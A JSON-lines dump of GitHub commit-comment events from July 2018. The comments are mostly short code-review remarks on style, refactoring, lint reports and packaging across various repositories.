{"id":"7941022651","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29650111,"position":null,"line":null,"path":null,"commit_id":"7adb3fa64397ce82cce907b508797f24b851afef","created_at":"2018-07-10T01:58:41Z","updated_at":"2018-07-10T01:58:41Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Связи, созвездия: функция обхода всего созвездия и соединения его с другими созвездиями - необходимо убрать слепые созвездия.](https://trello.com/c/puIMdLK5/3-%D1%81%D0%B2%D1%8F%D0%B7%D0%B8-%D1%81%D0%BE%D0%B7%D0%B2%D0%B5%D0%B7%D0%B4%D0%B8%D1%8F-%D1%84%D1%83%D0%BD%D0%BA%D1%86%D0%B8%D1%8F-%D0%BE%D0%B1%D1%85%D0%BE%D0%B4%D0%B0-%D0%B2%D1%81%D0%B5%D0%B3%D0%BE-%D1%81%D0%BE%D0%B7%D0%B2%D0%B5%D0%B7%D0%B4%D0%B8%D1%8F-%D0%B8-%D1%81%D0%BE%D0%B5%D0%B4%D0%B8%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F-%D0%B5%D0%B3%D0%BE-%D1%81-%D0%B4%D1%80%D1%83%D0%B3%D0%B8%D0%BC%D0%B8-%D1%81%D0%BE%D0%B7%D0%B2%D0%B5%D0%B7%D0%B4%D0%B8%D1%8F%D0%BC%D0%B8-%D0%BD%D0%B5%D0%BE%D0%B1%D1%85%D0%BE%D0%B4%D0%B8%D0%BC%D0%BE-%D1%83%D0%B1%D1%80%D0%B0%D1%82%D1%8C-%D1%81%D0%BB%D0%B5%D0%BF%D1%8B%D0%B5-%D1%81%D0%BE%D0%B7%D0%B2%D0%B5%D0%B7%D0%B4%D0%B8%D1%8F)"}},"created_at":"2018-07-10T01:58:41Z"}
{"id":"7941024119","type":"CommitCommentEvent","actor":{"login":"Unlcef"},"repo":{"name":"skwhddn/gittest"},"payload":{"comment":{"id":29650116,"position":null,"line":null,"path":null,"commit_id":"6d266937f036ee0e1e8bb11a17be813d44f63b7c","created_at":"2018-07-10T01:59:14Z","updated_at":"2018-07-10T01:59:14Z","author_association":"NONE","body":"ㅋㅋ"}},"created_at":"2018-07-10T01:59:14Z"}
{"id":"7941024297","type":"CommitCommentEvent","actor":{"login":"CNMan"},"repo":{"name":"felixonmars/dnsmasq-china-list"},"payload":{"comment":{"id":29650117,"position":null,"line":null,"path":null,"commit_id":"6f24b7aca23714173738643bf693eb409fa83c54","created_at":"2018-07-10T01:59:18Z","updated_at":"2018-07-10T01:59:18Z","author_association":"NONE","body":"`SkYTs.NET` 大小写不同导致重复了，看起来脚本要处理一下大小写，然后去重"}},"created_at":"2018-07-10T01:59:18Z"}
{"id":"7942746918","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653778,"position":50,"line":50,"path":"week-08/day-03/movie-selector.html","commit_id":"36ee8812ebc8afd2ab86109ee9f59686a8fbd42c","created_at":"2018-07-10T10:00:00Z","updated_at":"2018-07-10T10:00:00Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-10T10:00:00Z"}
{"id":"7942750133","type":"CommitCommentEvent","actor":{"login":"romeshRaghavan"},"repo":{"name":"romeshRaghavan/TnE_Dev-APP"},"payload":{"comment":{"id":29653796,"position":null,"line":null,"path":null,"commit_id":"250a581ac239ad805e8fd01b489a78d5d5f2a79a","created_at":"2018-07-10T10:00:32Z","updated_at":"2018-07-10T10:00:32Z","author_association":"OWNER","body":"file updated plist"}},"created_at":"2018-07-10T10:00:32Z"}
{"id":"7942752297","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653800,"position":4,"line":4,"path":"week-08/day-02/bubbling.js","commit_id":"42258326b3580e250323d140397af4bfee069d7d","created_at":"2018-07-10T10:00:54Z","updated_at":"2018-07-10T10:00:54Z","author_association":"NONE","body":";"}},"created_at":"2018-07-10T10:00:54Z"}
{"id":"7942752932","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653803,"position":18,"line":18,"path":"week-08/day-02/bubbling.js","commit_id":"42258326b3580e250323d140397af4bfee069d7d","created_at":"2018-07-10T10:01:01Z","updated_at":"2018-07-10T10:01:01Z","author_association":"NONE","body":"=>"}},"created_at":"2018-07-10T10:01:01Z"}
{"id":"7942755508","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29653809,"position":270,"line":270,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T10:01:28Z","updated_at":"2018-07-10T10:01:28Z","author_association":"OWNER","body":"This can go from O(N) -> O(1) by changing the map to be keyed on the strings and make the integers the values. \r\n\r\nqualityMap = {\r\n    [\"gray\"] = 0,\r\n    [\"poor\"] = 0, \r\n...\r\n}\r\n\r\nfor k,v in ipairs({...}) do\r\n    if type(v) == \"string\" and Vendor.VendorRuleFunctions.QualityMap[v] == itemQuality then\r\n        return true\r\n    elseif ..."}},"created_at":"2018-07-10T10:01:28Z"}
{"id":"7942758918","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653817,"position":13,"line":13,"path":"week-08/day-02/bubbling.js","commit_id":"42258326b3580e250323d140397af4bfee069d7d","created_at":"2018-07-10T10:02:05Z","updated_at":"2018-07-10T10:02:05Z","author_association":"NONE","body":"=>"}},"created_at":"2018-07-10T10:02:05Z"}
{"id":"7942761665","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.discussion"},"payload":{"comment":{"id":29653821,"position":null,"line":null,"path":null,"commit_id":"29da5ce8f802a4be8cf0b11a49a309aff73d8140","created_at":"2018-07-10T10:02:34Z","updated_at":"2018-07-10T10:02:34Z","author_association":"NONE","body":"@iham Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.app.discussion/73/violations\n```\nplone/app/discussion/conversation.py:41:1: I001 isort found an import in the wrong position\nplone/app/discussion/interfaces.py:62:80: E501 line too long (80 > 79 characters)\nplone/app/discussion/comment.py:184:19: C812 missing trailing comma\nplone/app/discussion/comment.py:358:14: C812 missing trailing comma\nplone/app/discussion/comment.py:360:28: C812 missing trailing comma\nplone/app/discussion/comment.py:433:28: C812 missing trailing comma\nplone/app/discussion/browser/comment.py:16:1: I004 isort found an unexpected blank line in imports\nplone/app/discussion/browser/comment.py:17:1: I001 isort found an import in the wrong position\nplone/app/discussion/tests/test_conversation.py:23:1: I001 isort found an import in the wrong position\nplone/app/discussion/tests/test_conversation.py:621:11: T000 Todo note found.\nplone/app/discussion/tests/test_indexers.py:73:37: C812 missing trailing comma\nplone/app/discussion/tests/test_indexers.py:85:37: C812 missing trailing comma\nplone/app/discussion/tests/test_indexers.py:89:46: C812 missing trailing comma\nplone/app/discussion/tests/test_indexers.py:94:46: C812 missing trailing comma\nplone/app/discussion/tests/test_indexers.py:141:42: C812 missing trailing comma\nplone/app/discussion/tests/test_indexers.py:156:45: C812 missing trailing comma\nplone/app/discussion/tests/test_indexers.py:163:53: C812 missing trailing comma\nplone/app/discussion/tests/test_indexers.py:167:53: C812 missing trailing comma\nplone/app/discussion/tests/test_indexers.py:171:52: C812 missing trailing comma\nplone/app/discussion/tests/test_indexers.py:178:44: C812 missing trailing comma\nplone/app/discussion/tests/test_indexers.py:182:37: C812 missing trailing comma\nplone/app/discussion/tests/test_controlpanel.py:85:14: E131 continuation line unaligned for hanging indent\nplone/app/discussion/tests/test_comment.py:341:28: C812 missing trailing comma\nplone/app/discussion/tests/test_functional.py:31:46: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-10T10:02:34Z"}
{"id":"7942762071","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653823,"position":14,"line":14,"path":"week-08/day-02/bubbling.js","commit_id":"42258326b3580e250323d140397af4bfee069d7d","created_at":"2018-07-10T10:02:38Z","updated_at":"2018-07-10T10:02:38Z","author_association":"NONE","body":"Missing space after `if`"}},"created_at":"2018-07-10T10:02:38Z"}
{"id":"7942762778","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653824,"position":15,"line":15,"path":"week-08/day-02/bubbling.js","commit_id":"42258326b3580e250323d140397af4bfee069d7d","created_at":"2018-07-10T10:02:46Z","updated_at":"2018-07-10T10:02:46Z","author_association":"NONE","body":"Pay attention to indentations."}},"created_at":"2018-07-10T10:02:46Z"}
{"id":"7942764010","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653827,"position":16,"line":16,"path":"week-08/day-02/bubbling.js","commit_id":"42258326b3580e250323d140397af4bfee069d7d","created_at":"2018-07-10T10:02:58Z","updated_at":"2018-07-10T10:02:58Z","author_association":"NONE","body":"👌 "}},"created_at":"2018-07-10T10:02:58Z"}
{"id":"7942764944","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/nagyfranciska"},"payload":{"comment":{"id":29653828,"position":53,"line":53,"path":"week-08/day-04/db/src/main/java/com/database/db/controllers/TodoController.java","commit_id":"802fc5344d8c47f3bceb0b17da5209889788b473","created_at":"2018-07-10T10:03:08Z","updated_at":"2018-07-10T10:03:08Z","author_association":"NONE","body":"Yes you did it 👍 , but a get request isn't the best choice to edit a model. Now everything is visible in the url and it is dangerous. A `@PostMapping` would be a better choice. Also I would get the id as `long` instead of `String` to let the framework make parsing."}},"created_at":"2018-07-10T10:03:08Z"}
{"id":"7942765596","type":"CommitCommentEvent","actor":{"login":"J22Pregbaha"},"repo":{"name":"hiten0794/How-to-Create-Chat-Application-Using-Codeignter-PHP-MySql-Ajax-Jquery-Json"},"payload":{"comment":{"id":29653829,"position":null,"line":null,"path":null,"commit_id":"6cfebd6fb15f9e8fff49b5a7bbb5c671dba1658c","created_at":"2018-07-10T10:03:15Z","updated_at":"2018-07-10T10:03:15Z","author_association":"NONE","body":"Good day Sir,\r\nPlease I tried your Chat application code but it didn't work. The login function isn't working and I do not know how to fix it"}},"created_at":"2018-07-10T10:03:15Z"}
{"id":"7942767044","type":"CommitCommentEvent","actor":{"login":"ghollingworth"},"repo":{"name":"raspberrypi-ui/piwiz"},"payload":{"comment":{"id":29653831,"position":null,"line":null,"path":null,"commit_id":"7e158abe0fb48ebe164691133e99247cfa75b1c4","created_at":"2018-07-10T10:03:30Z","updated_at":"2018-07-10T10:03:30Z","author_association":"NONE","body":"Lovely"}},"created_at":"2018-07-10T10:03:30Z"}
{"id":"7942767278","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653832,"position":9,"line":9,"path":"week-08/day-02/counter.js","commit_id":"edbee81d1f7f93c05dde38477fcf53ac3215bd8a","created_at":"2018-07-10T10:03:32Z","updated_at":"2018-07-10T10:03:32Z","author_association":"NONE","body":";"}},"created_at":"2018-07-10T10:03:32Z"}
{"id":"7942769566","type":"CommitCommentEvent","actor":{"login":"densh"},"repo":{"name":"scala/scala"},"payload":{"comment":{"id":29653837,"position":22,"line":22,"path":"src/compiler/scala/tools/reflect/quasiquotes/Placeholders.scala","commit_id":"7184fe0d3740ac8558067c18bdf449a65a8a26b9","created_at":"2018-07-10T10:03:58Z","updated_at":"2018-07-10T10:03:58Z","author_association":"CONTRIBUTOR","body":"When you parse a snippet of code with quasiquote parser it should be able to distinguish identifier that was written by the user (q\"x\") and unquote location (q\"$x\"), both would appear to be near identical to quasiquote parser, as it takes string as input. So we have to mangle the names which correspond to unquote locations. They are parsed just like normal identifiers (albeit with special names), but are treated completely specially during reification of the parsed tree. "}},"created_at":"2018-07-10T10:03:58Z"}
{"id":"7942769983","type":"CommitCommentEvent","actor":{"login":"yanmarkman"},"repo":{"name":"MISL-EBU-System-SW/mainline-public"},"payload":{"comment":{"id":29653839,"position":7,"line":3282,"path":"drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c","commit_id":"b2628bf11f5afd99f32153bf6d09b093aefdd059","created_at":"2018-07-10T10:04:02Z","updated_at":"2018-07-10T10:04:02Z","author_association":"NONE","body":"The \"hw_version\" is not needed here since the MVPP2_QDIST_MULTI_MODE cannot be set for MVPP21.\r\nSo the queue_mode checking is enough\r\n"}},"created_at":"2018-07-10T10:04:02Z"}
{"id":"7942773850","type":"CommitCommentEvent","actor":{"login":"kui0319"},"repo":{"name":"thilong/GameGemPackages"},"payload":{"comment":{"id":29653850,"position":null,"line":null,"path":null,"commit_id":"113c5a962033008cfb3124d2ffe4fb9b79a0a765","created_at":"2018-07-10T10:04:46Z","updated_at":"2018-07-10T10:04:46Z","author_association":"NONE","body":"❤️"}},"created_at":"2018-07-10T10:04:46Z"}
{"id":"7942776875","type":"CommitCommentEvent","actor":{"login":"eivind88"},"repo":{"name":"bouvet/ost-ria-handbook"},"payload":{"comment":{"id":29653857,"position":5,"line":3,"path":"docs/shell.md","commit_id":"d33ab608c33990716120735d045a54740230cc59","created_at":"2018-07-10T10:05:23Z","updated_at":"2018-07-10T10:05:23Z","author_association":"NONE","body":"How do we feel about maybe bringing up definitions or explaining the differences between shells, terminals and CLIs here? Out of scope, or in?"}},"created_at":"2018-07-10T10:05:23Z"}
{"id":"7942777393","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653863,"position":7,"line":7,"path":"week-07/Day-04-05-Reddit/server.js","commit_id":"de6e6111af339ead2026d0a4bc67e026841cbecb","created_at":"2018-07-10T10:05:29Z","updated_at":"2018-07-10T10:05:29Z","author_association":"NONE","body":";"}},"created_at":"2018-07-10T10:05:29Z"}
{"id":"7942779301","type":"CommitCommentEvent","actor":{"login":"adrianreber"},"repo":{"name":"openhpc/ohpc"},"payload":{"comment":{"id":29653872,"position":null,"line":null,"path":null,"commit_id":"5e25de84fdc22b5a5e920b14280472861c8884f5","created_at":"2018-07-10T10:05:50Z","updated_at":"2018-07-10T10:05:50Z","author_association":"CONTRIBUTOR","body":"@koomie Owning /usr/lib/rpm/ and /usr/lib/rpm/fileattrs/ seems wrong. Those directories belong to RPM."}},"created_at":"2018-07-10T10:05:50Z"}
{"id":"7942780657","type":"CommitCommentEvent","actor":{"login":"kui0319"},"repo":{"name":"thilong/GameGemPackages"},"payload":{"comment":{"id":29653881,"position":null,"line":null,"path":null,"commit_id":"113c5a962033008cfb3124d2ffe4fb9b79a0a765","created_at":"2018-07-10T10:06:07Z","updated_at":"2018-07-10T10:06:07Z","author_association":"NONE","body":"https://github.com/thilong/GameGemPackages/commit/113c5a962033008cfb3124d2ffe4fb9b79a0a765#diff-ac35fca3795b0b80b216f451ffb21b28"}},"created_at":"2018-07-10T10:06:07Z"}
{"id":"7942782861","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"fbottarel/grasp-pose-gen"},"payload":{"comment":{"id":29653892,"position":null,"line":null,"path":null,"commit_id":"b7c895fe1aa66e85d352b6c8df1f3cbb0d81277c","created_at":"2018-07-10T10:06:32Z","updated_at":"2018-07-10T10:06:32Z","author_association":"COLLABORATOR","body":"boring final tuning but needed to grasp small objects consistently.\r\n\r\n@fbottarel "}},"created_at":"2018-07-10T10:06:32Z"}
{"id":"7942784938","type":"CommitCommentEvent","actor":{"login":"DU-jdto"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29653902,"position":null,"line":null,"path":null,"commit_id":"b41298d6686badb9109f604cdb54976be2e1c72f","created_at":"2018-07-10T10:06:54Z","updated_at":"2018-07-10T10:06:54Z","author_association":"NONE","body":"I wonder if this would be less TC-dependent without countermove pruning (as with that, if you never update the stats you're going to be unconditionally pruning almost all quiets at low depths, which is a really bad idea)."}},"created_at":"2018-07-10T10:06:54Z"}
{"id":"7942785312","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653905,"position":9,"line":9,"path":"week-07/Day-04-05-Reddit/server.js","commit_id":"de6e6111af339ead2026d0a4bc67e026841cbecb","created_at":"2018-07-10T10:06:59Z","updated_at":"2018-07-10T10:06:59Z","author_association":"NONE","body":"`app.use('/route', express.static('dirname'));`"}},"created_at":"2018-07-10T10:06:59Z"}
{"id":"7942786040","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653912,"position":14,"line":14,"path":"week-07/Day-04-05-Reddit/server.js","commit_id":"de6e6111af339ead2026d0a4bc67e026841cbecb","created_at":"2018-07-10T10:07:08Z","updated_at":"2018-07-10T10:07:08Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-10T10:07:08Z"}
{"id":"7942786533","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/nagyfranciska"},"payload":{"comment":{"id":29653915,"position":57,"line":57,"path":"week-08/day-04/db/src/main/java/com/database/db/controllers/TodoController.java","commit_id":"802fc5344d8c47f3bceb0b17da5209889788b473","created_at":"2018-07-10T10:07:13Z","updated_at":"2018-07-10T10:07:13Z","author_association":"NONE","body":"Here you want to modify a Todo that already in the database. I would get the todo from the database by id and modify only the fields that I have to.\r\n``` Todo tmp = repo.getOneById(id).get();\r\nif(isUrgent != null){\r\n  tmp.setIsUrgent(isUrgent);\r\n}...\r\nrepo.save(todo);```\r\nAlso if I want to write some logic like this, I would put it into a service."}},"created_at":"2018-07-10T10:07:13Z"}
{"id":"7942787162","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653920,"position":21,"line":21,"path":"week-07/Day-04-05-Reddit/server.js","commit_id":"de6e6111af339ead2026d0a4bc67e026841cbecb","created_at":"2018-07-10T10:07:20Z","updated_at":"2018-07-10T10:07:20Z","author_association":"NONE","body":";"}},"created_at":"2018-07-10T10:07:20Z"}
{"id":"7942788009","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653926,"position":25,"line":25,"path":"week-07/Day-04-05-Reddit/server.js","commit_id":"de6e6111af339ead2026d0a4bc67e026841cbecb","created_at":"2018-07-10T10:07:31Z","updated_at":"2018-07-10T10:07:31Z","author_association":"NONE","body":";"}},"created_at":"2018-07-10T10:07:31Z"}
{"id":"7942788427","type":"CommitCommentEvent","actor":{"login":"kui0319"},"repo":{"name":"thilong/GameGemPackages"},"payload":{"comment":{"id":29653929,"position":1,"line":1,"path":"README.md","commit_id":"f505443393caf619f2c5dbbbf6226c9e271c82e5","created_at":"2018-07-10T10:07:36Z","updated_at":"2018-07-10T10:07:36Z","author_association":"NONE","body":"Ass"}},"created_at":"2018-07-10T10:07:36Z"}
{"id":"7942792006","type":"CommitCommentEvent","actor":{"login":"kui0319"},"repo":{"name":"thilong/GameGemPackages"},"payload":{"comment":{"id":29653950,"position":null,"line":null,"path":null,"commit_id":"f505443393caf619f2c5dbbbf6226c9e271c82e5","created_at":"2018-07-10T10:08:19Z","updated_at":"2018-07-10T10:08:19Z","author_association":"NONE","body":"+1"}},"created_at":"2018-07-10T10:08:19Z"}
{"id":"7942792336","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653952,"position":33,"line":33,"path":"week-07/Day-04-05-Reddit/server.js","commit_id":"de6e6111af339ead2026d0a4bc67e026841cbecb","created_at":"2018-07-10T10:08:23Z","updated_at":"2018-07-10T10:08:23Z","author_association":"NONE","body":"Use single quotes."}},"created_at":"2018-07-10T10:08:23Z"}
{"id":"7942796604","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29653975,"position":39,"line":39,"path":"rules/manager.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T10:09:15Z","updated_at":"2018-07-10T10:09:15Z","author_association":"OWNER","body":"Could this environment setup be done one-time during rule creation, instead of every time it is run? Or are you assuming the Script field might be edited after creation?"}},"created_at":"2018-07-10T10:09:15Z"}
{"id":"7942800870","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29653993,"position":42,"line":45,"path":"week-07/Day-04-05-Reddit/Public/frontend.js","commit_id":"763bf3f67fdf9919012cec3913e9224df9324794","created_at":"2018-07-10T10:10:06Z","updated_at":"2018-07-10T10:10:06Z","author_association":"NONE","body":"Siiiingle quotes."}},"created_at":"2018-07-10T10:10:06Z"}
{"id":"7942804359","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29653997,"position":55,"line":55,"path":"rules/manager.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T10:10:45Z","updated_at":"2018-07-10T10:10:45Z","author_association":"OWNER","body":"I wonder what string.len does if it is passed nil? Wondering if this could be simplified to string.len(ruleId) == 0, assuming string.len returns 0 if passed nil...."}},"created_at":"2018-07-10T10:10:45Z"}
{"id":"7942805715","type":"CommitCommentEvent","actor":{"login":"malarozi"},"repo":{"name":"thilong/GameGemPackages"},"payload":{"comment":{"id":29654001,"position":1,"line":1,"path":"README.md","commit_id":"f505443393caf619f2c5dbbbf6226c9e271c82e5","created_at":"2018-07-10T10:11:00Z","updated_at":"2018-07-10T10:11:00Z","author_association":"NONE","body":"GameGemPackages"}},"created_at":"2018-07-10T10:11:00Z"}
{"id":"7942812813","type":"CommitCommentEvent","actor":{"login":"mwf"},"repo":{"name":"utrack/clay"},"payload":{"comment":{"id":29654018,"position":4,"line":10,"path":"transport/httpruntime/mjson.go","commit_id":"c818eae31dee3bc344ab114337a31b32542aa92b","created_at":"2018-07-10T10:12:24Z","updated_at":"2018-07-10T10:12:24Z","author_association":"CONTRIBUTOR","body":"`goimports`\r\n\r\nplease move \"reflect\" to the stdlib import block"}},"created_at":"2018-07-10T10:12:24Z"}
{"id":"7942820438","type":"CommitCommentEvent","actor":{"login":"khanhas"},"repo":{"name":"Agilulfulus/hello-world"},"payload":{"comment":{"id":29654034,"position":null,"line":null,"path":null,"commit_id":"1f64893d07d116c6cd8e8fcc01b054aebc068487","created_at":"2018-07-10T10:13:57Z","updated_at":"2018-07-10T10:13:57Z","author_association":"NONE","body":"😏"}},"created_at":"2018-07-10T10:13:57Z"}
{"id":"7942824956","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29654047,"position":96,"line":96,"path":"rules/manager.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T10:14:55Z","updated_at":"2018-07-10T10:14:55Z","author_association":"OWNER","body":"nit: ImportGlobals (PascalCase globals, camelCase locals)"}},"created_at":"2018-07-10T10:14:55Z"}
{"id":"7942827517","type":"CommitCommentEvent","actor":{"login":"gerhardol"},"repo":{"name":"gitextensions/gitextensions"},"payload":{"comment":{"id":29654062,"position":null,"line":null,"path":null,"commit_id":"ed45c4b33cfc8dda522a90c911fb656681fe335e","created_at":"2018-07-10T10:15:25Z","updated_at":"2018-07-10T10:15:25Z","author_association":"CONTRIBUTOR","body":"Is this synced with #5087 the v3-ux branch by @drewnoakes ?\r\n"}},"created_at":"2018-07-10T10:15:25Z"}
{"id":"7942840294","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29654090,"position":109,"line":109,"path":"rules/manager.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T10:17:59Z","updated_at":"2018-07-10T10:17:59Z","author_association":"OWNER","body":"At some point we should wrap the asserts in --@debug@  ...  --@end-debug@  so they are commented out of packaged builds."}},"created_at":"2018-07-10T10:17:59Z"}
{"id":"7942841875","type":"CommitCommentEvent","actor":{"login":"d7919"},"repo":{"name":"boutproject/BOUT-dev"},"payload":{"comment":{"id":29654092,"position":54,"line":45,"path":"src/sys/msg_stack.cxx","commit_id":"9f969780407e5cd126b18d4445f2ea1270cf911f","created_at":"2018-07-10T10:18:18Z","updated_at":"2018-07-10T10:18:18Z","author_association":"CONTRIBUTOR","body":"Is it worth doing similar to the old approach with something like:\r\n\r\n~~~~\r\nif (position >= stack.size() ){\r\n  stack.reserve(stack.size()+10);\r\n}\r\nstack[position] = buffer;\r\n~~~~\r\n"}},"created_at":"2018-07-10T10:18:18Z"}
{"id":"7942847792","type":"CommitCommentEvent","actor":{"login":"TheMatrix97"},"repo":{"name":"XaviRT/CreandoCuestionario"},"payload":{"comment":{"id":29654110,"position":null,"line":null,"path":null,"commit_id":"68ee205f7840ac11d4eef871b92aaa397bd65121","created_at":"2018-07-10T10:19:31Z","updated_at":"2018-07-10T10:19:31Z","author_association":"NONE","body":"nice :+1: "}},"created_at":"2018-07-10T10:19:31Z"}
{"id":"7942849670","type":"CommitCommentEvent","actor":{"login":"janpio"},"repo":{"name":"apache/cordova-windows"},"payload":{"comment":{"id":29654114,"position":10,"line":40,"path":"README.md","commit_id":"8cc627b8f5fb4a0959c4ef7a5994a4f358215fd6","created_at":"2018-07-10T10:19:54Z","updated_at":"2018-07-10T10:19:54Z","author_association":"CONTRIBUTOR","body":"💃 "}},"created_at":"2018-07-10T10:19:54Z"}
{"id":"7942850003","type":"CommitCommentEvent","actor":{"login":"ghtmtt"},"repo":{"name":"qgis/QGIS-Documentation"},"payload":{"comment":{"id":29654115,"position":null,"line":null,"path":null,"commit_id":"ea97239bf1cc80b4c011b4f8ce01d5908271f2fb","created_at":"2018-07-10T10:19:58Z","updated_at":"2018-07-10T10:19:58Z","author_association":"CONTRIBUTOR","body":"oh! I thought fixing the description was already in there.. thanks for the fix.. :) "}},"created_at":"2018-07-10T10:19:58Z"}
{"id":"7942850162","type":"CommitCommentEvent","actor":{"login":"MarcoszeLBS"},"repo":{"name":"MarcoszeLBS/tokens"},"payload":{"comment":{"id":29654117,"position":null,"line":null,"path":null,"commit_id":"c546153ff6176221b6d025fdd2edaee44ef5c428","created_at":"2018-07-10T10:20:00Z","updated_at":"2018-07-10T10:20:00Z","author_association":"OWNER","body":"Upload SDREcoin.\r\n"}},"created_at":"2018-07-10T10:20:00Z"}
{"id":"7942852114","type":"CommitCommentEvent","actor":{"login":"evtunit"},"repo":{"name":"evtunit/evtunit.github.io"},"payload":{"comment":{"id":29654119,"position":null,"line":null,"path":null,"commit_id":"b12f760cc76baac92eeb0550b3e50adbb1312292","created_at":"2018-07-10T10:20:23Z","updated_at":"2018-07-10T10:20:23Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-10T10:20:23Z"}
{"id":"7942854084","type":"CommitCommentEvent","actor":{"login":"hugurp"},"repo":{"name":"internet4000/trivia-radio4000"},"payload":{"comment":{"id":29654122,"position":4,"line":8,"path":"app/routes/quiz/questions.js","commit_id":"bdadf91c85ad3c45eaa45ca0de119d7eb29fa311","created_at":"2018-07-10T10:20:46Z","updated_at":"2018-07-10T10:20:46Z","author_association":"MEMBER","body":"sorry, merge conflict"}},"created_at":"2018-07-10T10:20:46Z"}
{"id":"7942894336","type":"CommitCommentEvent","actor":{"login":"svk31"},"repo":{"name":"bitshares/bitshares-ui-style-guide"},"payload":{"comment":{"id":29654217,"position":null,"line":null,"path":null,"commit_id":"02a57452198f9c9b7218f38868045df599b005a5","created_at":"2018-07-10T10:29:02Z","updated_at":"2018-07-10T10:29:02Z","author_association":"CONTRIBUTOR","body":"https://github.com/bitshares/bitshares-ui/issues/1681"}},"created_at":"2018-07-10T10:29:02Z"}
{"id":"7942899529","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29654225,"position":14,"line":37,"path":"sys/utils.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T10:30:09Z","updated_at":"2018-07-10T10:30:09Z","author_association":"OWNER","body":"Lol with your change, we have now replaced AceConsole with 4 lines."}},"created_at":"2018-07-10T10:30:09Z"}
{"id":"7942904892","type":"CommitCommentEvent","actor":{"login":"prakchanraksmey932"},"repo":{"name":"thilong/GameGemPackages"},"payload":{"comment":{"id":29654241,"position":null,"line":null,"path":null,"commit_id":"113c5a962033008cfb3124d2ffe4fb9b79a0a765","created_at":"2018-07-10T10:31:12Z","updated_at":"2018-07-10T10:31:12Z","author_association":"NONE","body":"hi"}},"created_at":"2018-07-10T10:31:12Z"}
